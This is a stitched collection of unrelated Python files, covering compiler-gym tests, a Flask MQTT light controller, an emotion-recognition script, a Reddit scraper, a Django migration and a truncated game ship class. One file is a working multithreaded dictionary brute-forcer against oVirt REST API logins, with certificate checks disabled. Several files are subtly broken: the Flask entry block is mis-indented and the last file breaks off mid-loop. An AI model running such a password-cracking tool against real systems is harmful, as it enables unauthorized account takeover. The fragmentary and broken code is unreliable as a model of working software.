        llvm.make_benchmark(llvm.ClangInvocation(["-invalid-arg"]))
def test_custom_benchmark_is_added_on_service_restart(env: LlvmEnv):
    # When the service is restarted, the environment still uses the same custom
    # benchmark.
    with tempfile.TemporaryDirectory() as d:
        source = Path(d) / "a.c"
        with open(str(source), "w") as f:
            f.write("int main() { return 0; }")
        benchmark = llvm.make_benchmark(source)
        env.reset(benchmark=benchmark)
        assert env.benchmark == benchmark.uri

        # Kill the service so that the next call to reset() starts a new one.
        env.close()
        assert env.service is None
        env.reset()
        assert env.benchmark == benchmark.uri


def test_two_custom_benchmarks_reset(env: LlvmEnv):
    """Switching benchmarks takes effect only after the next reset()."""
    with tempfile.TemporaryDirectory() as d:
        source = Path(d) / "a.c"
        with open(str(source), "w") as f:
            f.write("int main() { return 0; }")
        benchmark1 = llvm.make_benchmark(source)
        benchmark2 = llvm.make_benchmark(source)

    # Same source, but each make_benchmark() call yields a distinct URI.
    assert benchmark1.uri != benchmark2.uri

    env.reset(benchmark=benchmark1)
    assert env.benchmark == benchmark1.uri
    env.reset()
    assert env.benchmark == benchmark1.uri
    with pytest.warns(
        UserWarning,
        match=r"Changing the benchmark has no effect until reset\(\) is called",
    ):
        env.benchmark = benchmark2
    env.reset()
    assert env.benchmark == benchmark2.uri


def test_failing_build_cmd(env: LlvmEnv, tmpdir):
    """Test that reset() raises an error if build command fails."""
    (Path(tmpdir) / "program.c").touch()

    benchmark = env.make_benchmark(Path(tmpdir) / "program.c")

    # Inject a bogus compiler flag into the benchmark's build command.
    benchmark.proto.dynamic_config.build_cmd.argument.extend(
        ["$CC", "$IN", "-invalid-cc-argument"]
    )
    benchmark.proto.dynamic_config.build_cmd.timeout_seconds = 10

    with pytest.raises(
        BenchmarkInitError,
        match=r"clang: error: unknown argument: '-invalid-cc-argument'",
    ):
        env.reset(benchmark=benchmark)
def test_make_benchmark_from_command_line_empty_input(env: LlvmEnv):
    """Empty command lines (str or list) are rejected."""
    with pytest.raises(ValueError, match="Input command line is empty"):
        env.make_benchmark_from_command_line("")
    with pytest.raises(ValueError, match="Input command line is empty"):
        env.make_benchmark_from_command_line([])


@pytest.mark.parametrize("cmd", ["gcc", ["gcc"]])
def test_make_benchmark_from_command_line_insufficient_args(env: LlvmEnv, cmd):
    """A compiler invocation with no inputs is rejected."""
    with pytest.raises(ValueError, match="Input command line 'gcc' is too short"):
        env.make_benchmark_from_command_line(cmd)


@pytest.mark.parametrize("cmd", ["gcc in.c -o foo", ["gcc", "in.c", "-o", "foo"]])
def test_make_benchmark_from_command_line_build_cmd(env: LlvmEnv, cmd):
    """The generated build command compiles IR with clang to the -o target."""
    with temporary_working_directory() as cwd:
        with open("in.c", "w") as f:
            f.write("int main() { return 0; }")

        bm = env.make_benchmark_from_command_line(cmd, system_includes=False)

        assert bm.proto.dynamic_config.build_cmd.argument[:4] == [
            str(llvm_paths.clang_path()),
            "-xir",
            "$IN",
            "-o",
        ]
        assert bm.proto.dynamic_config.build_cmd.argument[-1].endswith(f"{cwd}/foo")


@pytest.mark.parametrize("cmd", ["gcc in.c -o foo", ["gcc", "in.c", "-o", "foo"]])
def test_make_benchmark_from_command_line(env: LlvmEnv, cmd):
    """End-to-end: benchmark loads, and compile() produces the binary."""
    with temporary_working_directory() as cwd:
        with open("in.c", "w") as f:
            f.write("int main() { return 0; }")

        bm = env.make_benchmark_from_command_line(cmd)
        # Creating the benchmark must not have run the final link yet.
        assert not (cwd / "foo").is_file()

        env.reset(benchmark=bm)
        assert "main()" in env.ir

        assert (cwd / "foo").is_file()
        (cwd / "foo").unlink()
        bm.compile(env)
        assert (cwd / "foo").is_file()


def test_make_benchmark_from_command_line_no_system_includes(env: LlvmEnv):
    """With system includes disabled, <stdio.h> cannot be found."""
    with temporary_working_directory():
        with open("in.c", "w") as f:
            f.write(
                """
#include <stdio.h>

int main() {
    return 0;
}
"""
            )
        with pytest.raises(BenchmarkInitError, match="stdio.h"):
            env.make_benchmark_from_command_line("gcc in.c", system_includes=False)


def test_make_benchmark_from_command_line_system_includes(env: LlvmEnv):
    """With system includes (the default), <stdio.h> resolves fine."""
    with temporary_working_directory():
        with open("in.c", "w") as f:
            f.write(
                """
#include <stdio.h>

int main() {
    return 0;
}
"""
            )
        env.make_benchmark_from_command_line("gcc in.c")


def test_make_benchmark_from_command_line_stdin(env: LlvmEnv):
    """Command lines reading source from stdin are rejected."""
    with pytest.raises(ValueError, match="Input command line reads from stdin"):
        env.make_benchmark_from_command_line(["gcc", "-xc", "-"])
@pytest.mark.parametrize("retcode", [1, 5])
def test_make_benchmark_from_command_line_multiple_input_sources(
    env: LlvmEnv, retcode: int
):
    """Test that command lines with multiple source files are linked together."""
    with temporary_working_directory() as cwd:
        with open("a.c", "w") as f:
            f.write("int main() { return B(); }")

        with open("b.c", "w") as f:
            f.write(f"int B() {{ return {retcode}; }}")

        bm = env.make_benchmark_from_command_line(["gcc", "a.c", "b.c", "-o", "foo"])
        assert not (cwd / "foo").is_file()

        env.reset(benchmark=bm)
        assert "main()" in env.ir

        bm.compile(env)
        assert (cwd / "foo").is_file()

        # The linked binary's exit code proves b.c was linked in.
        p = subprocess.Popen(["./foo"])
        p.communicate(timeout=60)
        assert p.returncode == retcode


@pytest.mark.parametrize("retcode", [1, 5])
def test_make_benchmark_from_command_line_mixed_source_and_object_files(
    env: LlvmEnv, retcode: int
):
    """Test a command line that contains both source files and precompiled
    object files. The object files should be filtered from compilation but
    used for the final link.
    """
    with temporary_working_directory():
        with open("a.c", "w") as f:
            f.write(
                """
#include "b.h"

int A() {
    return B();
}

int main() {
    return A();
}
"""
            )

        with open("b.c", "w") as f:
            f.write(f"int B() {{ return {retcode}; }}")

        with open("b.h", "w") as f:
            f.write("int B();")

        # Compile b.c to object file:
        subprocess.check_call([str(llvm_paths.clang_path()), "b.c", "-c"], timeout=60)
        assert (Path("b.o")).is_file()

        bm = env.make_benchmark_from_command_line(["gcc", "a.c", "b.o", "-o", "foo"])
        env.reset(benchmark=bm)

        bm.compile(env)
        assert Path("foo").is_file()

        # Exit code proves the precompiled b.o made it into the link.
        p = subprocess.Popen(["./foo"])
        p.communicate(timeout=60)
        assert p.returncode == retcode


def test_make_benchmark_from_command_line_only_object_files(env: LlvmEnv):
    """A command line with no source files (objects only) is rejected."""
    with temporary_working_directory():
        with open("a.c", "w") as f:
            f.write("int A() { return 5; }")

        # Compile b.c to object file:
        subprocess.check_call([str(llvm_paths.clang_path()), "a.c", "-c"], timeout=60)
        assert (Path("a.o")).is_file()

        with pytest.raises(
            ValueError, match="Input command line has no source file inputs"
        ):
            env.make_benchmark_from_command_line(["gcc", "a.o", "-c"])


if __name__ == "__main__":
    main()
|
996,877 | 0daeed2ec34474a3e16f8ba2d1dedb98bfc0abfb | from flask import Flask, render_template, flash, redirect, request, url_for
from flask_mqtt import Mqtt
from flask_socketio import SocketIO
import ssl
import subprocess
import atexit
import time
import json
from config import *
# Activate python environment:
# source venv/bin/activate
# Deactivate python environment:
# deactivate
# =========================================================================
# Global Variables:
x_loc = 0
y_loc = 0
intensity = 0.7
r_val = 255
b_val = 255
g_val = 255
num_leds = 300
length = 5 #(in meters)
leds_per_m = num_leds/length
mode = "Localized"
radius = 10
# Using Development Broker
# # =========================================================================
# # Start the MQTT broker in another thread:
# # Service stopped in the exithandler function (CTRL-C)
# # verify with 'netstat -at'
# subprocess.Popen('sudo mosquitto -c mosquitto.conf', shell=True)
# # Sleep to allow password to be entered (TODO - find a better way)
# time.sleep(5)
# subprocess.Popen('python3 on-server-client.py')
# =========================================================================
# Start the Flask App and Configure MQTT
app = Flask(__name__)
# Development Broker Used Instead
# app.config['MQTT_BROKER_URL'] = '0.0.0.0'
# app.config['MQTT_BROKER_PORT'] = 8883
# Public HiveMQ development broker, plain (unencrypted) MQTT on 1883.
app.config['MQTT_BROKER_URL'] = 'broker.hivemq.com'
app.config['MQTT_BROKER_PORT'] = 1883
app.config['MQTT_USERNAME'] = ''
app.config['MQTT_PASSWORD'] = ''
app.config['MQTT_REFRESH_TIME'] = 0.1  # refresh time in seconds
# TLS Settings — disabled while using the public development broker.
app.config['MQTT_TLS_ENABLED'] = False
# Using Development Broker Instead without TLS
# app.config['MQTT_TLS_ENABLED'] = True
# app.config['MQTT_TLS_INSECURE'] = True
# app.config['MQTT_TLS_VERSION'] = ssl.PROTOCOL_TLSv1_2
# app.config['MQTT_TLS_CA_CERTS'] = '/etc/mosquitto/ca_certificates/ca.crt'
mqtt = Mqtt(app)
socketio = SocketIO(app)
# SECRET comes from config.py (imported above via `from config import *`).
app.secret_key = SECRET
# =========================================================================
# ****************************HTML Pages***********************************
# =========================================================================
# Startpage
@app.route('/')
def startpage():
    """Landing page."""
    return render_template('startpage.html')

@app.route('/console_log')
def console_log():
    """Live console/log view (fed by the socketio MQTT events below)."""
    return render_template('console_log.html')

@app.route('/mapping')
def mapping():
    """LED-strip mapping view."""
    return render_template('mapping.html')
@app.route('/settings', methods=['GET', 'POST'])
def settings():
    """Render the settings form; on POST, validate the submitted values,
    update the module-level strip configuration, publish it over MQTT,
    and redirect to the console log."""
    global r_val, g_val, b_val, intensity, num_leds, mode, radius
    form_vals = [r_val, g_val, b_val, intensity, num_leds, mode, radius]
    if request.method == 'POST':
        inputs = request.form
        for setting in inputs:
            print(setting)
            if setting in ('redid', 'greenid', 'blueid'):
                # Colour channels must be a single byte.
                channel = int(inputs[setting])
                if 0 <= channel <= 255:
                    if setting == 'redid':
                        r_val = channel
                    elif setting == 'greenid':
                        g_val = channel
                    else:
                        b_val = channel
            elif setting == 'intensityid':
                intensity = float(inputs[setting])
            elif setting == 'numberid':
                # Strip supports at most 300 LEDs.
                requested = int(inputs[setting])
                if 0 <= requested <= 300:
                    num_leds = requested
            elif setting == 'radiusid':
                # Radius cannot exceed the (current) strip length.
                requested = int(inputs[setting])
                if 0 <= requested <= num_leds:
                    radius = requested
            elif setting == 'modeid':
                mode = inputs[setting]
        # Push the full configuration to the strip (QoS 1).
        payload = json.dumps(dict(
            red=r_val,
            green=g_val,
            blue=b_val,
            brightness=intensity,
            number=num_leds,
            mode=mode,
        ))
        mqtt.publish('configurations/strip1', payload, 1)
        return redirect(url_for('console_log'))
    return render_template('settings.html', form_vals=form_vals)
# =========================================================================
# **************************MQTT Functions*********************************
# =========================================================================
@mqtt.on_message()
def handle_mqtt_message(client, userdata, message):
    """Decode an incoming MQTT message, forward it to web clients over
    Socket.IO, and feed it into location processing."""
    data = dict(
        topic=message.topic,
        payload=message.payload.decode()
    )
    print('\nGot A message\n')
    socketio.emit('mqtt_rec', data=data)
    location_processing(data)
@mqtt.on_log()
def handle_logging(client, userdata, level, buf):
    """Print paho-mqtt client log lines for debugging."""
    print(level, buf)
@mqtt.on_connect()
def handle_connect(client, userdata, flags, rc):
    """Subscribe to the light-strip topic once the broker connection is up."""
    mqtt.subscribe('lights/strip1')
@mqtt.on_publish()
def handle_publish(client, userdata, result):
    """Notify web clients that an MQTT publish completed.

    bug fix: the original emitted the undefined name `data`, raising a
    NameError on every publish; emit the paho message id we actually have.
    """
    print('data published')
    socketio.emit('mqtt_pub', data=dict(mid=result))
# =========================================================================
# ***************************Helper Functions******************************
# =========================================================================
# Called when CTRL-C is pressed to cleanly stop the MQTT broker
def exit_handler():
    """atexit hook; broker shutdown is disabled while the development broker is in use."""
    # print('\nStopping Mosquitto')
    # subprocess.Popen('service mosquitto stop', shell=True)
    print('The application is closing')
def location_processing(data):
    """Interpret an incoming MQTT payload according to the current display mode."""
    global optional
    if mode == 'Localized':
        pass # TODO: Not implemented yet
    elif mode == 'Perpendicular':
        # NOTE(review): `optional` is written but never read in this file —
        # confirm a consumer exists elsewhere.
        optional = float(data['payload'])
    elif mode == 'Parallel':
        optional = float(data['payload'])
    elif mode == 'Solid':
        pass # Don't actually need to do anything
def lighting_processing(data):
    """Publish the current (x, y) location as JSON; `data` is currently unused."""
    new_data = json.dumps(dict( # encodes the dictionary as a json to send
        x=x_loc,
        y=y_loc
    ))
    mqtt.publish('locations/strip1', new_data, 1)
# =========================================================================
# Start up the app
if __name__ == '__main__':
atexit.register(exit_handler)
socketio.run(app, host='0.0.0.0', use_reloader=True, debug=True)
|
996,878 | 5ea4f36b0bdd255c3b0b2cb41468d0c8f7ce269f | #!/usr/bin/python3
import linecache
import ovirtsdk4 as sdk
import argparse
import threading
import time
cracked = False
def ovirt_login_wrapper(url, username, password):
    """Return True when the credentials authenticate against the oVirt REST API.

    bug fix: the original never closed the SDK connection, leaking one
    HTTP connection per attempted password.
    """
    conn = sdk.Connection(url=url,
                          username=username,
                          password=password,
                          insecure=True)
    try:
        return conn.test()
    finally:
        conn.close()
def passwd_dict_linecount(dic_file):
    """Count the lines in the password dictionary file.

    bug fix: the original opened the file without ever closing it,
    leaking the file handle.
    """
    with open(dic_file) as f:
        return sum(1 for line in f)
def range_tuples(num, divide):
    """Split the line range [1, num] into roughly `divide` contiguous
    (start, end) chunks for the worker threads.

    bug fix: when divide > num the original computed a range step of 0 and
    range() raised ValueError; clamp the step to at least 1.

    NOTE(review): chunks are consumed end-exclusively by the caller, so line
    `num` itself is never read — confirm this is intended.
    """
    step = max(1, int(num / divide))
    divide_list = list(range(1, num, step)) + [num]
    return list(zip(divide_list[0:-1], divide_list[1:]))
def main():
    """Parse CLI args, split the dictionary across worker threads, and
    brute-force the oVirt login until a password works or the list ends."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-l', '--login', help='Login user')
    parser.add_argument('-d', '--dictionary', help='The password dictionary')
    parser.add_argument('-u', '--url', help='The rest api url')
    parser.add_argument('-t', '--threads', type=int, default=2, help='Threads numbers')
    args = parser.parse_args()
    threads_num = args.threads
    line_num = passwd_dict_linecount(args.dictionary)
    line_range_tuples = range_tuples(line_num, threads_num)
    def ovirt_crack(line_tuple):
        # Worker: try every password in this half-open line range.
        # NOTE(review): range(start, end) is end-exclusive, so the dictionary's
        # last line is never attempted — confirm range_tuples semantics.
        global cracked
        for line in range(line_tuple[0], line_tuple[1]):
            # NOTE(review): linecache.getline keeps the trailing newline, so the
            # password sent includes '\n' — likely needs .rstrip('\n').
            password = linecache.getline(args.dictionary, line)
            print("Trying password: %s" % password)
            if ovirt_login_wrapper(args.url, args.login, password):
                cracked = True
                print("The password is cracked: %s\n" % password)
    threads = [threading.Thread(target=ovirt_crack, args=(line_tuple,)) for line_tuple in line_range_tuples]
    for t in threads:
        t.start()
    global cracked
    # Poll until all workers finished or one of them found the password.
    while len(threading.enumerate()) > 1 and not cracked:
        time.sleep(1)
    for t in threads:
        t.join()
    # NOTE(review): printed even when the password WAS cracked — guard on `cracked`.
    print("password not found in dictionary\n")
if __name__ == "__main__":
    main()
|
996,879 | 4155a5365df16ba7608d1cf669befaca6d7b1b57 | def powerof2(n):
# base cases
# '1' is the only odd number
# which is a power of 2(2^0)
if n == 1:
return True
# all other odd numbers are not powers of 2
elif n%2 != 0 or n == 0:
return False
#recursive function call
return powerof2(n/2)
# Driver Code
if __name__ == "__main__":
print(powerof2(64)) #True
print(powerof2(12)) #False |
996,880 | 69f054f4823c62780e974cb7b2ef786e80d8db85 | import mxnet as mx
import cv2
from collections import namedtuple
from os.path import join
from mxnet import nd
import numpy as np
import pdb
import matplotlib.pyplot as plt
import sys
##from dataset_loader import DatasetLoader
def format_image(image):
    '''Detect a face (OpenCV cascade classifier) in the given frame and format
    it for MXNet input. Returns a (1, 1, H, W) NDArray scaled to [0, 1], or
    None when no face is found or the resize fails.'''
    if len(image.shape) > 2 and image.shape[2] == 3:
        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    else:
        # bug fix: cv2.CV_LOAD_IMAGE_GRAYSCALE was removed in OpenCV 3+;
        # IMREAD_GRAYSCALE is the supported constant.
        image = cv2.imdecode(image, cv2.IMREAD_GRAYSCALE)
    faces = cascade_classifier.detectMultiScale(
        image,
        scaleFactor=1.3,
        minNeighbors=5
    )
    # None if we didn't find a face
    if not len(faces) > 0:
        return None
    # Keep the detection with the largest area.
    max_area_face = faces[0]
    for face in faces:
        if face[2] * face[3] > max_area_face[2] * max_area_face[3]:
            max_area_face = face
    # Chop image to face. OpenCV detections are (x, y, w, h): rows span
    # y..y+h and columns x..x+w.
    # bug fix: the original swapped width and height in the slice.
    face = max_area_face
    image = image[face[1]:(face[1] + face[3]), face[0]:(face[0] + face[2])]
    # Resize image to network size
    try:
        image = cv2.resize(image, (input_height, input_width),
                           interpolation=cv2.INTER_CUBIC) / 255.
    except Exception:
        print("[+] Problem during resize")
        return None
    # HWC grayscale -> NCHW batch of one.
    image = nd.array(image).expand_dims(-1).transpose((2, 0, 1)).expand_dims(0)
    return image
def load_images(img):
    '''Accept an image path or a raw video frame; return a network-ready
    (1, 1, H, W) NDArray together with the original BGR frame.'''
    frame = cv2.imread(img) if type(img) == str else img
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    gray = cv2.resize(gray, (input_height, input_width), interpolation=cv2.INTER_CUBIC)
    tensor = nd.array(gray).expand_dims(-1).transpose((2, 0, 1)).expand_dims(0)
    return tensor, frame
def draw_bars(frame, result, feelings_faces):
    '''Overlay per-emotion probability bars and the winning emoji on the frame,
    then display it (matplotlib when run with a CLI argument, OpenCV otherwise).'''
    if result is None:
        # bug fix: original message was garbled ("prob shuold not bereturnne Type")
        print('result should not be None. Please check...')
        return
    for index, emotion in enumerate(EMOTIONS):
        cv2.putText(frame, emotion, (10, index * 22 + 20),
                    cv2.FONT_HERSHEY_PLAIN, 0.5, (0, 255, 0), 1)
        cv2.rectangle(frame, (130, index * 22 + 10),
                      (130 + int(result[0][index] * 100),
                       (index + 1) * 22 + 4), (255, 0, 0), -1)
    face_image = feelings_faces[np.argmax(result[0])]
    # Alpha-blend the RGBA emoji onto the frame using its alpha channel.
    for c in range(0, 3):
        frame[EMOJI_H:EMOJI_H+EMOJI_SIZE, EMOJI_R:EMOJI_R+EMOJI_SIZE, c] = \
            face_image[:, :, c] * (face_image[:, :, 3] / 255.0) + \
            frame[EMOJI_H:EMOJI_H+EMOJI_SIZE, EMOJI_R:EMOJI_R+EMOJI_SIZE, c] * (1.0 - face_image[:, :, 3] / 255.0)
    if len(sys.argv) > 1:
        plt.imshow(frame[..., ::-1])   # BGR -> RGB for matplotlib
        plt.show()
    else:
        cv2.imshow('FER', frame)
CASC_PATH = 'CASC/haarcascade_frontalface_default.xml'
EMOJI_H, EMOJI_R = 160, 10
EMOJI_SIZE = 80
model_prefix = 'models/My_FER_model'
num_epoch = 10000
input_width, input_height = 48, 48
cascade_classifier = cv2.CascadeClassifier(CASC_PATH)
EMOTIONS = ['angry', 'disgusted', 'fearful',
'happy', 'sad', 'surprised', 'neutral']
def get_emojis(EMOTIONS):
    '''Load one 80x80 RGBA emoji image per emotion, in EMOTIONS order.'''
    return [cv2.resize(cv2.imread('../emojis/' + emotion + '.png', -1), (80, 80))
            for emotion in EMOTIONS]
def build_model(model_prefix, num_epoch):
    """Load a trained MXNet checkpoint and bind it for single-image CPU
    inference. Returns the bound Module and the Batch namedtuple used to
    wrap inputs for mod.forward()."""
    sym, arg_params, aux_params = mx.model.load_checkpoint(model_prefix, num_epoch)
    # NOTE(review): `data` is never used — the bound shape below references the
    # symbol's own 'data' input; candidate for removal.
    data = mx.sym.Variable(name='data')
    mod = mx.mod.Module(symbol=sym, context=mx.cpu(0), label_names=None)
    mod.bind(for_training=False, data_shapes=[('data',(1,1,input_height,input_width))])
    mod.set_params(arg_params, aux_params, allow_missing=True)
    Batch = namedtuple('Batch', ['data'])
    return mod, Batch
if len(sys.argv)>1:
mod, Batch = build_model(model_prefix, num_epoch)
frame = cv2.imread(sys.argv[1])
img = format_image(frame)
mod.forward(Batch([nd.array(img)]))
prob = mod.get_outputs()[0].asnumpy()
print('predictions: {0}'.format(list(zip(EMOTIONS,list(prob[0])))))
feelings_faces = get_emojis(EMOTIONS)
draw_bars(frame, prob, feelings_faces) |
996,881 | 21c9d83241175693af3598597a21bb1a8e3623ab | import numpy as np
import pandas as pd
from pandas import DataFrame, Series
import praw
import re
import time
rscotch = pd.read_csv('rscotch.csv')
new_cols = rscotch.columns.values
new_cols[1] = 'name'
new_cols[3] = 'link'
new_cols[2] = 'user'
for i in range(len(new_cols)):
new_cols[i] = new_cols[i].lower()
rscotch = DataFrame(rscotch, columns = new_cols)
urls = [url for url in rscotch.link.values]
'''
NEED TO USE A REDDIT USERNAME HERE
'''
user_agent = ("scotch review bot 0.1 by /u/YOUR_USERNAME_HERE")
r = praw.Reddit(user_agent = user_agent)
initialTime = time.time()
# Python 2 script: fetch the first top-level comment (assumed to be the review
# text) for every submission link in the frame.
for i in rscotch.index:
    if i % 50 == 0:
        # Progress heartbeat every 50 rows (Python 2 print statement).
        update = time.time()
        print update - initialTime
    try:
        link = rscotch.link[i]
        submission = r.get_submission(link)
        forest_comments = submission.comments
        review = forest_comments[0]
        rscotch.ix[i, 'reviewText'] = review
    except:
        # NOTE(review): bare except swallows everything, including
        # KeyboardInterrupt — narrow once the failure modes are known.
        rscotch.ix[i, 'reviewText'] = 'invalid url?'
def convertReviews(review):
    """Return the comment body of a fetched review; the 'invalid url?'
    sentinel passes through unchanged."""
    if review == 'invalid url?':
        return 'invalid url?'
    return review.body
rscotch['review'] = rscotch['reviewText'].apply(convertReviews)
# bug fix: DataFrame.drop returns a new frame — the original discarded the
# result, so the raw 'reviewText' column was still written to the CSV.
rscotch = rscotch.drop('reviewText', axis=1)
rscotch.to_csv('rscotch_reviews.csv', encoding = 'utf-8')
|
996,882 | c3e00c28f488cda379c3168cd09f0d1295da33ba | #!/bin/env dls-python
from pkg_resources import require
require("mock")
require("cothread")
import unittest
import sys
import weakref
import os
import cothread
import logging
#logging.basicConfig(level=logging.DEBUG)
# Module import
sys.path.append(os.path.join(os.path.dirname(__file__), "..", ".."))
from malcolm.core.base import weak_method
class Loop(object):
    """Spawns a cothread event loop that appends an incrementing counter to
    `outs` every ~10ms; weak_method lets the loop die when the object does."""
    def __init__(self, outs):
        self.outs = outs   # shared list the loop writes into
        self.i = 0         # counter appended on each tick
        self.stop_requested = cothread.Event(auto_reset=False)
        self.proc = cothread.Spawn(weak_method(self.event_loop))
        self.status = 0
    def loop_event(self):
        # NOTE(review): this truth-tests the Event *object*, not whether it was
        # signalled — confirm cothread.Event defines boolean signalled-state,
        # otherwise this branch fires on every tick or never.
        if self.stop_requested:
            raise StopIteration
        cothread.Sleep(0.01)
        self.outs.append(self.i)
        self.i += 1
    def event_loop(self):
        # Runs until the weak reference to self dies (ReferenceError), then exits.
        while True:
            try:
                weak_method(self.loop_event)()
            except ReferenceError:
                return
        # NOTE(review): unreachable — the loop only exits via the return above.
        self.status = 1
    def __del__(self):
        # Ask the loop to stop and wait for the spawned cothread to finish.
        self.stop_requested.Signal()
        self.proc.Wait()
class LoopTest(unittest.TestCase):
    def test_loop_del_called_when_out_of_scope(self):
        """The loop ticks while referenced and stops once its only strong
        reference is dropped (i.e. __del__ / weak_method worked)."""
        self.outs = []
        l = Loop(self.outs)
        cothread.Sleep(0.1)
        # ~10ms per tick over 0.1s -> nine entries expected
        self.assertEqual(self.outs, [0, 1, 2, 3, 4, 5, 6, 7, 8])
        # Drop the only strong reference; the spawned loop must die with it.
        l = None
        cothread.Sleep(0.1)
        # List unchanged: no further ticks after collection.
        self.assertEqual(self.outs, [0, 1, 2, 3, 4, 5, 6, 7, 8])
if __name__ == '__main__':
unittest.main(verbosity=2)
|
996,883 | a0d2b29b5baac76ca6fb50dd4097121fb44b457a | # Generated by Django 2.0.1 on 2018-01-31 01:05
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration: make Event.maps_url and Event.venue
    optional (blank and null allowed)."""
    dependencies = [
        ('main', '0012_auto_20180130_1922'),
    ]
    operations = [
        migrations.AlterField(
            model_name='event',
            name='maps_url',
            field=models.URLField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='event',
            name='venue',
            field=models.CharField(blank=True, max_length=100, null=True),
        ),
    ]
|
996,884 | f42c5c9dcec1e8d01deb1c54aecc9df5392c26b7 | from colors import PICO_DARKGRAY, PICO_PINK, PICO_WHITE
from v2 import V2
from animrotsprite import AnimRotSprite
import random
import math
import particle
import bullet
import helper
from healthy import Healthy
FLEET_RADIUS = 15
TARGET_POWER = 4
FLEET_HEADING_POWER = 1
FLEET_SEPARATION_POWER = 1
FLEET_SEPARATION_DEGRADE = 100
FLEET_SEPARATION_MAX = 12
FLEET_PROXIMITY_POWER = 1
WARP_DRIVE_TIME = 30.0
WARP_PLANET_MIN_DIST = 15
BASE_HEALTH = 10
THRUST_PARTICLE_RATE = 0.25
# Particle effects
class Ship(AnimRotSprite, Healthy):
def __init__(self, scene, pos, owning_civ, sheet):
AnimRotSprite.__init__(self, pos, sheet, 12)
self.base_speed = 7
self.scene = scene
self.owning_civ = owning_civ
self.target = None
self.offset = (0.5,0.5)
self.speed_t = random.random() * 6.2818
self._layer = 2
self.velocity = V2(0,0)
self.push_velocity = V2(0,0)
self.orbits = True
self.collidable = True
self.collision_radius = 1
self.thrust_particle_time = 0
self._recalc_rect()
self.warp_drive_countdown = 0
self.warp_drive_t = 0
self.base_health = BASE_HEALTH
self.size = 2
Healthy.__init__(self, self.scene, (14,3))
    def get_max_health(self):
        # Max health = base pool scaled by the owning civ's 'ship_health' upgrade bonus.
        return self.base_health * (1 + self.owning_civ.upgrade_stats['ship_health'])
    def update(self, dt):
        """Per-frame update: track the health bar, die at zero health, tick the
        warp cooldown, and apply planet-avoidance push."""
        self.health_bar.pos = self.pos + V2(0, -self.height / 2)
        if self.health <= 0:
            # NOTE(review): execution continues after kill() — countdown and
            # push still run on the frame the ship dies; confirm intended.
            self.kill()
        self.warp_drive_countdown -= dt
        self.push_from_planets(dt)
        AnimRotSprite.update(self,dt)
def push_from_planets(self,dt):
for planet in self.scene.get_planets():
dist = (planet.pos - self.pos).sqr_magnitude()
if dist < (planet.get_radius() + 5) ** 2:
delta = (self.pos - planet.pos)
dir = delta.normalized()
mag = abs((planet.get_radius() + 5) - delta.magnitude())
fwd = V2.from_angle(self._angle)
self.push_velocity = dir * mag
w = fwd.cross(dir)
if w > 0:
self._angle += 5 * dt
self.push_velocity += V2(dir.y, -dir.x) * 2
else:
self._angle -= 5 * dt
self.push_velocity -= V2(dir.y, -dir.x) * 2
self.push_velocity *= 0.9
def default_update(self, dt):
self.travel_to_target(dt)
self._update_image()
def can_land(self, p):
return p.owning_civ == self.owning_civ and p == self.target
def turn_towards(self, vector, dt):
facing = V2.from_angle(self._angle)
cp = facing.cross(vector)
try:
ao = math.acos(facing.dot(vector))
except ValueError:
ao = 0
if ao < 0.25:
self._angle = math.atan2(vector.y, vector.x)
else:
if cp > 0:
self._angle += 3 * dt
else:
self._angle -= 3 * dt
return cp
def try_warp(self, dt):
if self.owning_civ.upgrade_stats['warp_drive'] == 0:
return
if self.warp_drive_countdown > 0:
return
towards = (self.target.pos - self.pos).normalized()
nearest,dist = helper.get_nearest(self.pos, self.scene.get_planets())
if nearest:
if dist < (nearest.get_radius() + WARP_PLANET_MIN_DIST) ** 2:
return
if self.warp_drive_t < 0.66:
self.velocity = V2(0,0)
self.warp_drive_t += dt
if int(self.warp_drive_t * 40) % 2 == 0:
pvel = V2(random.random() - 0.5, random.random() - 0.5) * 15
pvel -= towards * 25
p = particle.Particle([PICO_WHITE, PICO_PINK],1,self.pos,0.25 + random.random() * 0.25,pvel)
self.scene.game_group.add(p)
return
exit_dist = (self.target.pos - self.pos).magnitude() - self.target.get_radius() - WARP_PLANET_MIN_DIST
max_dist = self.owning_civ.upgrade_stats['warp_drive'] + 30
dist = min(exit_dist, max_dist)
print(dist)
for i in range(0, int(dist), 4):
p = self.pos + towards * i
pvel = V2(random.random() - 0.5, random.random() - 0.5) * 15
pvel += towards * 15
p = particle.Particle([PICO_WHITE, PICO_PINK],1,p,0.25 + random.random() * 0.5,pvel)
self.scene.game_group.add(p)
nearest,d = helper.get_nearest(p, self.scene.get_planets())
if nearest and d < (nearest.get_radius() + WARP_PLANET_MIN_DIST) ** 2:
dist = i
break
self.warp_drive_t = 0
self.pos = self.pos + towards * dist
print(towards, dist, self.pos)
self.warp_drive_countdown = WARP_DRIVE_TIME * (dist / max_dist)
def travel_to_target(self, dt):
### Directional Forces ###
target_vector = V2(0,0)
# Towards target
if self.orbits:
orbital_pos = (self.pos - self.target.pos).normalized() * (self.target.size + 20) + self.target.pos
towards_angle = (orbital_pos - self.pos).to_polar()[1]
else:
towards_angle = (self.target.pos - self.pos).to_polar()[1]
towards_angle += math.sin(self.speed_t) / 4
target_vector += V2.from_angle(towards_angle) * TARGET_POWER
target_vector += self.get_fleet_target_vector()
# Now turn towards that target vector
target_vector = target_vector.normalized()
self.turn_towards(target_vector, dt)
self.speed_t += dt
speed = math.sin(self.speed_t) * 2 + self.base_speed
speed *= self.owning_civ.upgrade_stats['move_speed'] + 1
self.velocity = V2.from_angle(self._angle) * speed
self.try_warp(dt)
self.pos += (self.velocity + self.push_velocity) * dt
if self.velocity.sqr_magnitude() > 0:
self.thrust_particle_time += dt
if self.thrust_particle_time > THRUST_PARTICLE_RATE:
pvel = V2(random.random() - 0.5, random.random() - 0.5) * 5
pvel += -self.velocity / 2
p = particle.Particle("assets/thrustparticle.png",1,self.pos + -self.velocity.normalized() * self.size,1,pvel)
self.scene.game_group.add(p)
self.thrust_particle_time -= THRUST_PARTICLE_RATE
def get_fleet_target_vector(self):
target_vector = V2(0,0)
our_ships = self.scene.get_civ_ships(self.owning_civ)
fleet_ships = [s for s in our_ships if (s.pos - self.pos).sqr_magnitude() <= FLEET_RADIUS ** 2]
fleet_ships.remove(self)
# Separation
for ship in fleet_ships:
